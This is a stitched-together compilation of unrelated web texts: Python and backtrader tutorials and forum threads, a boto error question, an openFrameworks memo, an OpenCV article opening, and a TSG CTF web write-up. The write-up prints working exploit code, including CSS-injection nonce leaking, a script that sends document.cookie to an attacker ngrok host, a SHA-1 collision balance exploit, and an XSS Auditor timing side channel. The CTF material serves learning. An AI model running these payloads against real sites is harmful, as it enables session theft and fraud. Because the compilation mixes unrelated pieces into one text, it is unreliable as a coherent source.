Next, the constraints and bounds are defined. For this example only a seat distance constraint is present. The bounds for each of the design variables are defined in the bounds variable. Lastly, the optimization itself is performed, here invoking the SLSQP algorithm.
For more details and examples of the capabilities of the scipy.optimize package, follow this link.
And there we have it: a full optimization of an AMS model, and an easy template to build other, more advanced optimization processes upon.
Try it now: Make sure to try out the full AMS tutorial here.
This post is hosted on GitHub, feel free to provide feedback here.
|
As you can tell from your work with Calvin Coolidge’s Cool College, once you start including lots of if statements in a function the code becomes a little cluttered and clunky. Luckily, there are other tools we can use to build control flow.
else statements allow us to elegantly describe what we want our code to do when certain conditions are not met.
else statements always appear in conjunction with if statements. Consider our waking-up example to see how this works:
if weekday:
print("wake up at 6:30")
else:
print("sleep in")
In this way, we can build if statements that execute different code depending on whether conditions are met. This prevents us from needing to write an if statement for each possible condition; we can instead write a blanket else statement for all the times the condition is not met.
Let’s return to our if statement for our movie streaming platform. Previously, all it did was check if the user’s age was over 13 and if so, print out a message. We can use an else statement to return a message in the event the user is too young to watch the movie.
if age >= 13:
print("Access granted.")
else:
print("Sorry, you must be 13 or older to watch this movie.")
Instructions
1.
Calvin Coolidge’s Cool College has another request for you. They want you to add an additional check to a previous if statement. If a student is failing to meet both graduation requirements, they want it to print:
"You do not meet the requirements to graduate."
Add an else statement to the existing if statement.
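A minimal sketch of what the finished check might look like — the variable names credits and gpa and the thresholds are assumptions here, since the exercise's starter code is not shown:
if credits >= 120 and gpa >= 2.0:
  print("You meet the requirements to graduate!")
else:
  print("You do not meet the requirements to graduate.")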
|
Settings lines and params on __init__
Ok, for my factor and index strategy I have created a Feed like this:
class MultiFactorFeed(bt.feeds.GenericCSVData):
factors = ("DIV_YIELD", "EBITDA", "EPS")
indices = ("SP50", "DOW")
lines = factors + indices
params = (
('dtformat', '%Y-%m-%d'),
# This avoids time adjustment to the end of the session
('timeframe', bt.TimeFrame.Minutes),
('datetime', 0),
('time', -1),
('open', 1),
('high', 1),
('low', 1),
('close', 1),
('volume', -1),
('openinterest', -1)
) + tuple((el, i + 2) for i, el in enumerate(lines))
Explanation is simple:
"factors" cols contain the additional data items, beyond price, for my multi-factor strategy
"indices" cols contain the market index membership, in binary. 1 means that equity A is in index B at time T. 0 means it is not.
I use daily price data, no time portion (-1), only with close price (all to position 1), without volume (-1) or open interest (-1).
All the other columns starting from 2 are first factors, then indices.
A few questions:
Is there any way to make MultiFactorFeed more abstract, so that I could pass factors and indices on __init__ and reuse the class when I change factor or index composition? There seems to be a lot of metaclass black magic that interferes with that. Something like this fails:
class MultiFactorFeed(bt.feeds.GenericCSVData):
def __init__(self, dataname=dataname, name=name, factors=factors, indices=indices):
self.factors = factors
self.indices = indices
self.lines = factors + indices
self.params = (
('dtformat', '%Y-%m-%d'),
# This avoids time adjustment to the end of the session
('timeframe', bt.TimeFrame.Minutes),
('datetime', 0),
('time', -1),
('open', 1),
('high', 1),
('low', 1),
('close', 1),
('volume', -1),
('openinterest', -1)
) + tuple((el, i + 2) for i, el in enumerate(self.lines))
super().__init__(dataname, name)
I am using ('timeframe', bt.TimeFrame.Minutes) to avoid my dates being turned from:
2002-12-27 00:00:00
into:
2002-12-27 23:59:59.999989
And being misaligned with other data sources. Is there a better, cleaner way to disable that "end of session" feature?
Thank you!
Is there any way to make MultiFactorFeed more abstract, so that I could pass factors and indices on __init__ and reuse the class when I change factor or index composition? There seems to be a lot of metaclass black magic that interferes with that. Something like this fails:
lines is a declaration, and all instances of the MultiFactorFeed class are expected to have the same lines.
What you need is to create a class on the fly with type, which defines the extra lines you need.
MyDynamicLinesClass = type(give_it_a_random_name, bt.feeds.GenericCSVData, dct={'lines': factors + indices})
data = MyDynamicLinesClass(*some_args, **kwargs)
cerebro.adddata(data)
And being misaligned with other data sources. Is there a better, cleaner way to disable that "end of session" feature?
Not automatically. The reason to push daily timeframes to the limit of the day is to avoid them being overtaken by lower-resolution timeframes. Because if the time of the daily resolution is 00:00:00 and it is put in the same scheme as a data feed with minute resolution, a time of 00:00:01 in the minute-resolution data feed will surpass the daily resolution, which cannot happen in real life.
It works! Though apparently the second argument has to be a tuple, correct?
AssetFeed = type("AssetFeed", (bt.feeds.GenericCSVData,), {"lines" : lines, "params" : params})
Thank you very much.
Not automatically. The reason to push daily timeframes to the limit of the day is to avoid them being overtaken by lower resolution timeframes. Because if the time of the daily resolution is 00:00:00 and is put in the same scheme as a data feed with minute resolution, a time 00:00:01 in the minute resolution data feed will surpass the daily resolution, which cannot happen in real life.
Correction: use the sessionend=datetime.time(hh, mm, ss, us) parameter when instantiating a data feed and that will be the end of session.
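A minimal sketch of that correction in use — the CSV file name and date format below are placeholders:
import datetime
import backtrader as bt

cerebro = bt.Cerebro()
data = bt.feeds.GenericCSVData(
    dataname='prices.csv',               # placeholder CSV file
    dtformat='%Y-%m-%d',
    sessionend=datetime.time(0, 0, 0),   # keep daily bars stamped at 00:00:00
)
cerebro.adddata(data)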
|
I took part in TSG CTF as team NaruseJun. We scored 4099 pts and finished 3rd.
I only solved the Web challenges. Below is my write-up.
BADNONCE Part 1 (247pts)
The task was to perform XSS on a page with CSP enabled and steal a cookie.
<meta http-equiv="Content-Security-Policy" content="script-src 'nonce-<?= $nonce ?>';">
Since the challenge is named BADNONCE, the nonce implementation is obviously suspect. Indeed, as shown below, the nonce is fixed per session ID, so if it leaks, XSS becomes possible.
session_start();
$nonce = md5(session_id());
The nonce in question is present as an attribute of an element in the page.
<script nonce=<?= $nonce ?>>
console.log('Welcome to the dungeon :-)');
</script>
Now, this page only restricts script-src, so stylesheets, for example, can be loaded freely from external sources. CSS injection is therefore possible, and by crafting clever selectors we can determine an element's attribute value.
However, the crawler imitating the admin's browser has a different PHPSESSID each time, so within a single run we have to extract the entire nonce and then make it trigger the XSS. It's a bit tedious, but I had the admin visit a page that keeps opening an attacker-prepared URL in an IFRAME, changing the injected CSS each time and finally firing the XSS. The implementation ended up as below; it is a bit heavy for a web exploit, and a smarter approach may well exist.
<?php
if (array_key_exists("save", $_GET)) {
file_put_contents("flag.txt", $_GET["save"] . PHP_EOL, LOCK_EX | FILE_APPEND);
}
else if (array_key_exists("nonce", $_GET)) {
$nonce = file_get_contents("nonce.txt");
if (strlen($nonce) < strlen($_GET["nonce"])) {
file_put_contents("nonce.txt", $_GET["nonce"], LOCK_EX);
}
}
else if (array_key_exists("css", $_GET)) {
header("Content-Type: text/css");
echo("script { display: block }" . PHP_EOL);
$nonce = file_get_contents("nonce.txt");
$chars = str_split("0123456789abcdef");
foreach ($chars as $c1) {
foreach ($chars as $c2) {
$x = $nonce . $c1 . $c2;
echo("[nonce^='" . $x . "'] { background: url(http://cf07fd07.ap.ngrok.io/?nonce=" . $x . ") }" . PHP_EOL);
}
}
}
else if (array_key_exists("go", $_GET)) {
$nonce = file_get_contents("nonce.txt");
if (strlen($nonce) < 32) {
header("Location: http://35.187.214.138:10023/?q=%3Clink%20rel%3D%22stylesheet%22%20href%3D%22http%3A%2F%2Fcf07fd07.ap.ngrok.io%2F%3Fcss%3D" . microtime(true) . "%22%3E");
}
else {
header("Location: http://35.187.214.138:10023/?q=%3Cscript%20nonce%3D%22" . $nonce . "%22%3Efetch(%22http%3A%2F%2Fcf07fd07.ap.ngrok.io%2F%3Fsave%3D%22%20%2B%20encodeURIComponent(document.cookie))%3C%2Fscript%3E");
}
}
else if (array_key_exists("start", $_GET)) {
file_put_contents("nonce.txt", "", LOCK_EX);
file_put_contents("flag.txt", "", LOCK_EX);
?>
<html>
<body>
<script>
setInterval(() => {
const iframe = document.createElement("iframe");
iframe.src = `?go=${(new Date).getTime()}`;
document.body.appendChild(iframe);
}, 256);
</script>
</body>
</html>
<?php
}
else {
echo("E R R O R !");
}
?>
Secure Bank (497pts)
This is an application written in Ruby that lets you send and receive coins. It seems you can obtain the FLAG if you collect enough coins.
get '/api/flag' do
return err(401, 'login first') unless user = session[:user]
hashed_user = STRETCH.times.inject(user){|s| Digest::SHA1.hexdigest(s)}
res = DB.query 'SELECT balance FROM account WHERE user = ?', hashed_user
row = res.next
balance = row && row[0]
res.close
return err(401, 'login first') unless balance
return err(403, 'earn more coins!!!') unless balance >= 10_000_000_000
json({flag: IO.binread('data/flag.txt')})
end
The suspicious part is the transfer code, which looks like this.
post '/api/transfer' do
return err(401, 'login first') unless src = session[:user]
return err(400, 'bad request') unless dst = params[:target] and String === dst and dst != src
return err(400, 'bad request') unless amount = params[:amount] and String === amount
return err(400, 'bad request') unless amount = amount.to_i and amount > 0
sleep 1
hashed_src = STRETCH.times.inject(src){|s| Digest::SHA1.hexdigest(s)}
hashed_dst = STRETCH.times.inject(dst){|s| Digest::SHA1.hexdigest(s)}
res = DB.query 'SELECT balance FROM account WHERE user = ?', hashed_src
row = res.next
balance_src = row && row[0]
res.close
return err(422, 'no enough coins') unless balance_src >= amount
res = DB.query 'SELECT balance FROM account WHERE user = ?', hashed_dst
row = res.next
balance_dst = row && row[0]
res.close
return err(422, 'no such user') unless balance_dst
balance_src -= amount
balance_dst += amount
DB.execute 'UPDATE account SET balance = ? WHERE user = ?', balance_src, hashed_src
DB.execute 'UPDATE account SET balance = ? WHERE user = ?', balance_dst, hashed_dst
json({amount: amount, balance: balance_src})
end
At first glance, since transactions are not used, it looked like sending requests at high frequency could produce a double transfer via a race condition. I tried this briefly, but the timing was so tight that it almost never worked, so I gave up on that approach.
Looking at the code a bit more carefully, though, it is clear that coins multiply when the destination and the source are the same user. Of course, transfers to yourself are rejected, but while balances are looked up by the hashed username, the identity check is done on the original strings. In other words, if there is a pair of different strings whose SHA-1 hashes are identical, we should be able to mint coins indefinitely.
Speaking of SHA-1 collisions... that's SHAttered. I'll leave the detailed theory to a web search, but using it we can prepare a pair of strings (or rather byte sequences) satisfying the requirement above.
Taking care that non-printable characters are not mangled when sent as JSON, I prepared them as follows.
<?php
$s1 = file_get_contents("shattered-1.pdf");
$s2 = file_get_contents("shattered-2.pdf");
$t1 = substr($s1, 0, 320) . "narusejun";
$t2 = substr($s2, 0, 320) . "narusejun";
echo(sha1($t1) . PHP_EOL);
echo(sha1($t2) . PHP_EOL);
function toStr($c) {
$i = ord($c);
if ($c == '"') {
return '\\"';
}
if ($c == '%') {
return '%%';
}
if ($i < 0x20) {
return sprintf("\\u%04x", $i);
}
if ($i < 0x7F) {
return $c;
}
return sprintf("\\x%02x", ord($c));
}
$u1 = implode(array_map(toStr, str_split($t1)));
$u2 = implode(array_map(toStr, str_split($t2)));
echo($u1 . PHP_EOL);
echo($u2 . PHP_EOL);
?>
Register with one of these strings, then transfer coins specifying the other string as the destination, and the coins multiply. This is easy to do with curl.
RECON (500pts)
Another web challenge: a profile-registration service implemented in PHP. As a secret question you select whether you like each of 20 kinds of fruit, and apparently the goal is to RECON which fruits the admin likes.
Looking at the source code, the CSP is conspicuously weakened on the page where you view your own profile, which is suspicious.
$response->withHeader("Content-Security-Policy", "script-src-elem 'self'; script-src-attr 'unsafe-inline'; style-src 'self'")
Because these directives are a new feature, script-src-elem and script-src-attr were not being enforced, so in practice the page was wide open to XSS. However, this page displays the logged-in user's own profile, so it seems hard to make a targeted victim execute your code.
But why was such an unusual(?) restriction as script-src-attr put in place at all? The answer became obvious as soon as I looked carefully at the page source.
🍇 <input type="checkbox" id="grapes" onchange="grapes.checked=false;" >
🍈 <input type="checkbox" id="melon" onchange="melon.checked=false;" >
🍉 <input type="checkbox" id="watermelon" onchange="watermelon.checked=false;" >
🍊 <input type="checkbox" id="tangerine" onchange="tangerine.checked=false;" >
🍋 <input type="checkbox" id="lemon" onchange="lemon.checked=false;" >
🍌 <input type="checkbox" id="banana" onchange="banana.checked=false;" >
🍍 <input type="checkbox" id="pineapple" onchange="pineapple.checked=false;" >
🍐 <input type="checkbox" id="pear" onchange="pear.checked=false;" >
🍑 <input type="checkbox" id="peach" onchange="peach.checked=false;" >
🍒 <input type="checkbox" id="cherries" onchange="cherries.checked=false;" >
🍓 <input type="checkbox" id="strawberry" onchange="strawberry.checked=false;" >
🍅 <input type="checkbox" id="tomato" onchange="tomato.checked=false;" >
🥥 <input type="checkbox" id="coconut" onchange="coconut.checked=false;" >
🥭 <input type="checkbox" id="mango" onchange="mango.checked=false;" >
🥑 <input type="checkbox" id="avocado" onchange="avocado.checked=false;" >
🍆 <input type="checkbox" id="aubergine" onchange="aubergine.checked=false;" >
🥔 <input type="checkbox" id="potato" onchange="potato.checked=false;" >
🥕 <input type="checkbox" id="carrot" onchange="carrot.checked=false;" >
🥦 <input type="checkbox" id="broccoli" onchange="broccoli.checked=false;" >
🍄 <input type="checkbox" id="mushroom" onchange="mushroom.checked=false;" >
The secret question is displayed on the profile page, and JavaScript is used to prevent it from being changed! The partial unsafe-inline was apparently allowed precisely so that only this code could run.
If we can steal this little piece of JavaScript, we can learn which fruits the admin likes. The page sends the header X-XSS-Protection: 1; mode=block, so the XSS Auditor is expected to run in blocking mode, and the admin's browser presumably honors it. In such a situation there is a known technique for stealing in-page scripts by abusing XSS Auditor false positives.
It looked like we could use this here. (We could.) If we display the following two IFRAMEs, the XSS Auditor should block exactly one of them.
<iframe src='http://34.97.74.235:10033/profile?onchange="melon.checked=true;"'></iframe>
<iframe src='http://34.97.74.235:10033/profile?onchange="melon.checked=false;"'></iframe>
Exploiting this property, we open the two IFRAMEs from the attacker's page and determine which one was blocked. Checking the IFRAME element's contentWindow.length seemed like an easy way to tell whether the XSS Auditor had fired, but for some reason it didn't work when I tried it locally (this may have been a misunderstanding on my part), so I used the slightly more tedious approach of measuring the time until onload fires. When the XSS Auditor fires, the related resources are never loaded, so onload should be called sooner.
I implemented it as below, embedded the IFRAME in my profile, and had the admin visit it. The JavaScript mixes modern and legacy styles, which is ugly, but I was solving this right before the end of the CTF and rushing, so this is the residue of some misguided trial and error.
<?php
if(array_key_exists("save", $_GET)){
file_put_contents("save.txt", $_GET["save"] . PHP_EOL, FILE_APPEND | LOCK_EX);
echo("OK!");
}else{
?>
<html>
<body>
<script>
function test(key, val){
return new Promise(function(resolve){
const iframe = document.createElement("iframe");
iframe.onload = function(){
iframe.remove();
resolve([key, val, new Date().getTime() - time]);
};
iframe.src = `http://34.97.74.235:10033/profile?onchange="${key}.checked=${val};"`;
const time = new Date().getTime();
document.body.appendChild(iframe);
});
}
(async () => {
const results = [];
for(let i = 0; i < 1; i++){
results.push([
await test("mushroom", true),
await test("mushroom", false),
]);
}
location.href = "?save=" + results;
})();
</script>
</body>
</html>
<?php
}
?>
Using this, the measurements for each fruit are shown below. We had to solve the captcha over and over, which was brutal; I had teammates grind through the captchas for me. (A smarter implementation would probably have been a good idea.)
Fruit    onload with true (ms)    onload with false (ms)    Verdict
grapes 84 334 TRUE
melon 347 65 FALSE
watermelon 245 47 FALSE
tangerine 78 394 TRUE
lemon 83 418 TRUE
banana 73 255 TRUE
pineapple 79 452 TRUE
pear 252 48 FALSE
peach 74 281 TRUE
cherries 76 336 TRUE
strawberry 79 318 TRUE
tomato 77 353 TRUE
coconut 77 333 TRUE
mango 92 404 TRUE
avocado 254 47 FALSE
aubergine 85 333 TRUE
potato 249 46 FALSE
carrot 72 321 TRUE
broccoli 428 40 FALSE
mushroom 87 388 TRUE
Finally, using these results, I was able to display the admin's recovery message (the FLAG).
Summary
I only worked on the web challenges, so I can't speak for the other categories, but these were good problems:
The hints were well placed, so guessing was kept to a minimum
The topics covered were interesting as well
That's it. Apparently we get some 💰 for this, so I'd like to go out for yakiniku 🐦
|
class Parent2():
    print('I am the second parent')
class Parent():
    print('I am the first parent')
class SubClass(Parent, Parent2):
    print('I am the subclass')
#
# Output: I am the second parent
#         I am the first parent
#         I am the subclass
# Note: the class body is executed as soon as the class is defined, from top to bottom
__bases__ returns all the parent classes of the current class; use SubClass.__bases__
print(SubClass.__bases__)
(<class '__main__.Parent'>, <class '__main__.Parent2'>)
Applying a parent-class interface to subclass objects is polymorphism. For example, create a Screw class with two attributes, thickness and thread density, then create two more classes, a long screw and a short screw, both inheriting from Screw. The long-screw and short-screw classes then share the same characteristics while also having their own. A subclass inherits its parent's characteristics and adds its own, producing different behavior; this is the structure of polymorphism.
Class attributes
Instance attributes
Instance methods
Class methods
Static methods (extension)
Implementation:
class Game(object):
top_score = 0  # highest game score, a class attribute
@staticmethod
def show_help():  # static method
print("Help: let the zombies walk into the room")
@classmethod
def show_top_score(cls):  # class method
print("The highest game score is %d" % cls.top_score)
def __init__(self, player_name):
self.player_name = player_name  # instance attribute
def start_game(self):  # instance method
print("[%s] starts the game..." % self.player_name)
Game.top_score = 999  # use the class name to modify the all-time high score
Test:
# 1. Show the game help
Game.show_help()
# 2. Show the highest game score
Game.show_top_score()
# 3. Create a game object and start the game
game = Game("Xiaoming")
game.start_game()
# 4. Game over; show the highest score
Game.show_top_score()
Errors may occur while a program is running — for example, using an index that does not exist, or adding two values of different types. We call these errors exceptions.
Handling exceptions: when an exception occurs at runtime, the intent is not to terminate the program outright. Python wants us to be able to write code that handles the exception when it occurs.
When an exception occurs inside a function and the function handles it, the exception does not propagate further. If the function does not handle it, the exception propagates to the caller. If the caller handles it, propagation stops there; otherwise it keeps propagating up the call chain until it reaches the global scope (the main module). If it is still not handled there, the program terminates and the exception information is displayed.
When an exception occurs during execution, all of the exception information is stored in an exception object, and propagating the exception really means throwing that exception object to the caller.
The try statement
try:
    code block (statements that might raise an error)
except ExceptionType as name:
    code block (how to handle that error)
except ExceptionType as name:
    code block (how to handle that error)
except ExceptionType as name:
    code block (how to handle that error)
....
else:
    code block (statements to run when no error occurred)
finally:
    code block (this block runs whether or not an error occurred)
try is required; else is optional
at least one of except and finally must be present
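A short, self-contained example of the structure described above:
try:
    result = 10 / int(input("Enter a number: "))
except ZeroDivisionError as e:
    print("Cannot divide by zero:", e)
except ValueError as e:
    print("That was not a number:", e)
else:
    print("The result is", result)
finally:
    print("This line runs whether or not an error occurred")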
|
python-usernames
Python library to validate usernames suitable for use in public-facing applications where users can choose login names and sub-domains.
Features
Provides a default regex validator
Validates against list of banned words that should not be used as username.
Python 2.7, 3.4, 3.5, 3.6, 3.7, 3.8 & PyPy
Installation
pip install python-usernames
Usages
from usernames import is_safe_username
>>> is_safe_username("jerk")
False # contains one of the banned words
>>> is_safe_username("handsome!")
False # contains non-url friendly `!`
is_safe_username takes the following optional arguments:
whitelist: a case-insensitive list of words that should always be considered safe. Default: []
blacklist: a case-insensitive list of words that should be considered unsafe. Default: []
max_length: the maximum number of characters a username can have. Default: None
regex: regular expression string that must pass before the banned words are checked.
The default regular expression is as follows:
^ # beginning of string
(?!_$) # no only _
(?![-.]) # no - or . at the beginning
(?!.*[_.-]{2}) # no __ or _. or ._ or .. or -- inside
[a-zA-Z0-9_.-]+ # allowed characters, at least one must be present
(?<![.-]) # no - or . at the end
$ # end of string
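A short sketch of the optional arguments described above in use (the word lists are arbitrary examples):
from usernames import is_safe_username

print(is_safe_username("jerk", whitelist=["jerk"]))      # True: whitelisted words are always treated as safe
print(is_safe_username("flower", blacklist=["flower"]))  # False: explicitly blacklisted
print(is_safe_username("a" * 40, max_length=30))         # False: longer than max_length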
Further Reading
Note:
Words like bigcock12 will validate just fine; only equality against the banned word list is checked. We don't try to be smart, to avoid the Scunthorpe problem. If you can come up with an algorithm/solution, please create an issue/PR :).
License
MIT
|
Running Python inside openFrameworks (C++).
This article is just a personal memo in which I tried out a great pioneer's write-up.
The article in question is the one just posted by @Hzikajr:
http://qiita.com/Hzikajr/items/afe73cb287af5ab90265
You should definitely read that rather than this post of mine.
Seriously, please read it.
None of the important points are covered in my article here.
For pyenv I referred to this:
http://www.python-izm.com/contents/basis/pyenv.shtml
I had personally been struggling to get Python and oF working together, so this was a huge help.
The test setup is exactly the same environment as @Hzikajr's.
I also tried part of the examples from satoruhiga's ofxPy:
https://github.com/satoruhiga/ofxPy
print('hello from test_script.py')
def my_fn():
print ('hello from python function')
def my_fn2(theta):
import math
a = math.sin(theta * math.pi)
return a
def get_random():
import random
return (random.random(), random.random())
def size_expression(t):
import math
return abs(math.sin(t * math.pi) + math.sin(t * math.pi * 1.5))
#pragma once
#include "ofMain.h"
#include "ofxPy.h"
class ofApp : public ofBaseApp{
public:
void setup();
void update();
void draw();
void keyPressed(int key);
void keyReleased(int key);
void mouseMoved(int x, int y );
void mouseDragged(int x, int y, int button);
void mousePressed(int x, int y, int button);
void mouseReleased(int x, int y, int button);
void mouseEntered(int x, int y);
void mouseExited(int x, int y);
void windowResized(int w, int h);
void dragEvent(ofDragInfo dragInfo);
void gotMessage(ofMessage msg);
ofxPy::Context python;
};
#include "ofApp.h"
//--------------------------------------------------------------
void ofApp::setup(){
putenv((char *)"PYTHONHOME=/Users/ksumiya/.pyenv/versions/anaconda3-4.3.1");
python.setup();
ofSetFrameRate(60);
ofSetVerticalSync(true);
ofBackground(0);
// append data/python to PYTHONPATH
python.appendPath(ofToDataPath("python"));
// import and call python script function
python.exec("import test_script; test_script.my_fn()");
}
//--------------------------------------------------------------
void ofApp::update(){
ofSetWindowTitle(ofToString(ofGetFrameRate()));
}
//--------------------------------------------------------------
void ofApp::draw(){
// get tuple return value
auto v = python.eval<ofxPy::tuple>("test_script.get_random()");
// unpack and cast array-like object
float x = ofxPy::get<float>(v, 0) * ofGetWidth();
float y = ofxPy::get<float>(v, 1) * ofGetHeight();
ofDrawRectangle(x, y, 10, 10);
// get function and call with argument
float s = python.eval("test_script.size_expression").call(ofGetElapsedTimef()).cast<float>();
ofDrawCircle(ofGetMouseX(), ofGetMouseY(), s * 50);
float a = python.eval("test_script.my_fn2").call(0.25).cast<float>();
string msg;
msg += ofToString(1/a) + "\n";
ofSetColor(255);
ofDrawBitmapString(msg, 100, 100);
}
The only part I added was my_fn2.
As a result, since it is 1/sin(pi/4), we get sqrt(2), i.e. 1.414...
The pioneers are amazing...
|
Getting stuck in calculating average turnover
Trying to calculate average turnover
def __init__(self):
self.addminperiod(260)
self.stocks = self.datas[2:]
for d in self.stocks:
self.inds[d] = {}
turnover = d.close * d.volume
print (d.open[0],d.high[0],d.low[0],d.close[0],d.volume[0], d.openinterest[0])
self.inds[d]["avg_turnover"] = bt.indicators.SimpleMovingAverage(turnover,period=20)
ohlcv data is printed correctly
In the next function, when I try to print the average turnover with print(self.inds[d]["avg_turnover"][0]), I am getting nan as output, while expecting the average turnover.
Any pointers would be very useful.
Post the whole script from beginning to end, please.
|
I'm trying to connect to AWS using boto but I'm getting an error.
First, I created an AWS account, and then in the management console I clicked on IAM and created a new user.
This user has an associated AWS_ACESS_KEY_ID and AWS_SECRET_ACESS_KEY.
I then stored this user's credentials in /etc/boto.cfg and in ~/.boto, like this:
[Credentials]
aws_acess_key_id = ...
aws_secret_acess_key = ...
Now I'm trying to connect with boto but I'm getting this error:
Traceback (most recent call last):
File "send.py", line 12, in <module>
s3 = boto.connect_s3()
File "/usr/local/lib/python2.7/dist-packages/boto-2.36.0-py2.7.egg/boto/__init__.py", line 141, in connect_s3
return S3Connection(aws_access_key_id, aws_secret_access_key, **kwargs)
File "/usr/local/lib/python2.7/dist-packages/boto-2.36.0-py2.7.egg/boto/s3/connection.py", line 190, in __init__
validate_certs=validate_certs, profile_name=profile_name)
File "/usr/local/lib/python2.7/dist-packages/boto-2.36.0-py2.7.egg/boto/connection.py", line 569, in __init__
host, config, self.provider, self._required_auth_capability())
File "/usr/local/lib/python2.7/dist-packages/boto-2.36.0-py2.7.egg/boto/auth.py", line 985, in get_auth_handler
'Check your credentials' % (len(names), str(names)))
boto.exception.NoAuthHandlerFound: No handler was ready to authenticate. 1 handlers were checked. ['HmacAuthV1Handler'] Check your credentials
boto [DEBUG]:Retrieving credentials from metadata server.
[ERROR]:Caught exception reading instance data
Do you see what can be wrong here?
|
A Python Tutorial, the Basics
A very easy Python Tutorial!
#Tutorial Jam
@elipie's jam p i n g
p i n g
Here is a basic tutorial for Python, for beginners!
Table of Contents:
1. The developer of python
2. Comments/Hashtags
3. Print and input statements
f' strings
4. If, Elif, Else statements
5. Common Modules
1. Developer of Python
It was created in the late 1980s by Guido van Rossum in the Netherlands. It was made as a successor to the ABC language, capable of interfacing with the Amoeba operating system. Its name is Python because, while thinking about it, he was also reading 'Monty Python's Flying Circus'. Guido van Rossum thought the language would need a short, unique name, so he chose Python.
For more about Guido van Rossum, click here
2. Comments/Hashtags
Comments are side notes you can write in Python. As I said before, they can be used for:
sidenotes
instructions or steps
etc.
How to write comments:
#This is a comment
The output is nothing because:
It is a comment and comments are invisible to the computer
Comments are not printed in Python
So just to make sure: hashtags are used to make comments. And remember, comments are ignored by the computer.
3. Print and Input statements
1. Print Statements
Print statements, printed as print, are statements used to print sentences or words. So for example:
print("Hello World!")
The output would be:
Hello World!
So you can see that the print statement is used to print words or sentences.
2. Input Statements
Input statements, printed as input, are statements used to 'ask'. For example:
input("What is your name?")
The output would be:
What is your name?
However, with inputs, you can write in them. You can also 'name' the input. Like this:
name = input("What is your name?")
You could respond by doing this:
What is your name? JBYT27
So pretty much, inputs are used to create a value that you can use later.
Then you could add a if statement, but lets discuss that later.
3. f strings
f-strings, printed as f (before a quotation mark), are used to insert a value that has already been defined into a string. So what I mean is, say I put an f-string on a print statement. Like this:
print(f"")
The output right now, is nothing. You didn't print anything. But say you add this:
print(f"Hello {name}!")
It would only work if name has been defined. In other words, say you had an input before and you did this with it:
name = input()
Then the f string would work. Say for the input, you put in your name. Then when the print statement would print:
Hello (whatever your name was)!
Another way you could do this is with commas. This won't use an f-string either. They are also similar. So how you would print it is like this:
name = input()
...
print("Hello ", name, "!")
The output would be the same as well! The commas separate the two strings and insert the name between them. But JBYT27, why not a plus sign? Well, you'd really have to ask Guido van Rossum, but I can answer it a bit: it's just Python's syntax. A plus sign only joins strings together, so if the value isn't a string you get an error, while commas let print() handle the conversion for you.
Really, the only time you would use this is to echo back the name, or to check whether one value is equal to another, which we'll learn in a sec.
4. If, Elif, Else Statements
1. If Statements
If statements, printed as if, are literally what they are called: 'if' sentences. They check whether a condition holds, and if it does, something happens. You can think of an if statement as cause and effect. An example of an if statement is:
name = input("What is your name?")
#asking for name
if name == "JBYT27":
print("Hello Administrator!")
The output could be:
What is your name? JBYT27
Hello Administrator!
However, say it isn't JBYT27. This is where the else, elif, try, and except statements comes in!
2. Elif Statements
Elif statements, printed as elif, are pretty much if statements; it's just that the words else and if are combined. So say you wanted to add more if statements. Then you would do this:
if name == "JBYT27":
print("Hello Administrator!")
elif name == "Code":
print("Hello Code!")
It's just adding more if statements, with an else mixed in!
3. Else Statements
Else statements, printed as else, are like if and elif statements. They are used to tell the computer that if none of the earlier conditions matched, it should fall back to this other result. You can use it like this (following on from the code above):
if name == "JBYT27":
print("Hello admin!")
elif name == "Squid":
print("Hello Lord Squod!")
else:
print(f"Hello {name}!")
5. Common Modules
Common modules include:
os
time
math
sys
replit
turtle
tkinter
random
etc.
So all these modules that I listed, I'll tell you how to use, step by step! ;) But wait, what are modules?
Modules are like packages that come pre-installed with Python. You just have to import them to load them into your program (please correct me if I'm wrong). So like this code:
import os
...
When you do this, you successfully import the os module! But wait, what can you do with it? The most common way people use the os module is to clear the page. By that I mean it clears the console (the black part), so it makes your screen clearer. But since there are many, many modules, you can also clear the screen using the replit module. The code is like this:
import replit
...
replit.clear()
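For comparison, here is roughly how the os version of clearing looks (note: 'clear' is the Linux/macOS command; on Windows it is 'cls'):
import os
...
os.system("clear")  # wipes the console; use os.system("cls") on Windows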
But one amazing thing about this importing is you can make things specific. Like say you only want to import pi and sqrt from the math package. This is the code:
from math import pi, sqrt
Let me mention that when you do this, never, ever add an and. Like from ... import ... and .... That is just horrible and stupid and... Just don't do it :)
Next is the time module
You can use the time module for:
time delay
scroll text
And yeah, that's pretty much it (I think)
Note:
All of the import syntax is the same except for the names
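For example, a tiny sketch of a time delay plus "scrolling" text, as mentioned above:
import time
...
print("Loading", end="")
for _ in range(3):
    time.sleep(0.5)                 # pause for half a second
    print(".", end="", flush=True)  # print the dots one at a time
print(" done!")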
Next is tkinter, turtle
You can use the tkinter module for GUIs (graphical windows); you can import it in a normal Python repl, or you can do this in a new repl.
You can use turtle for drawing; it isn't used much for web development though.
The math and sys
The math module is used for mathematical calculations. The sys module is used for accessing variables and functions of the Python interpreter itself. I don't really know how I could explain it better, but for more, click here.
Random
The random module is used for randomizing choices among variables and strings. Say you wanted to pick a random item from a list. Here would be the code:
import random
...
a_list = ["JBYT27","pie","cat","dog"]
...
random.choice(a_list)
The output would be a random choice from the variable/list. So it could be pie, JBYT27, cat, or dog. From the random module, there are many things you can import, but the most common are:
choice
randrange
etc.
And that's all for modules. If you want links, click below.
Links for modules:
And that's it!
Hooray! We made it through without sleeping!
Credits to:
Many coders for tutorials
Books and websites
replit
etc.
Links:
Web links:
ranging from a few hours to a few days, if you like reading
Video links:
ranging from 1–12 hours, if you don't like reading
Otherwise:
ranging from 5 hours to a few days, replit tutorial links
I hope you enjoyed this tutorial! I'll cya on the next post!
stay safe!
|
In "Having PaPeRo i count human faces with OpenCV on a Raspberry Pi", we used pre-trained cascade data to recognize human faces, but depending on the application you want to develop, there will be cases where you want to recognize something other than human faces.
As one such example, this time we will have OpenCV learn images of PaPeRo i's face, then show PaPeRo i a printed document containing pictures of PaPeRo i and have it speak the number of PaPeRo i units it sees.
As in the earlier article, the Raspberry Pi used is a Raspberry Pi 3 Model B v1.2 running Raspbian Stretch.
Unfortunately, the results this time were not very satisfactory, but they could probably be improved by, for example, increasing the number of training images.
Prerequisites
The following explanation assumes that the steps in "Having PaPeRo i count human faces with OpenCV on a Raspberry Pi" have already been completed.
Preparing the image files
Prepare the following images for training.
- Positive image (an image of PaPeRo i's face) → 1 file: paperoi.png
- Negative images (images not containing PaPeRo i's face) → 30 files: img001.png – img030.png
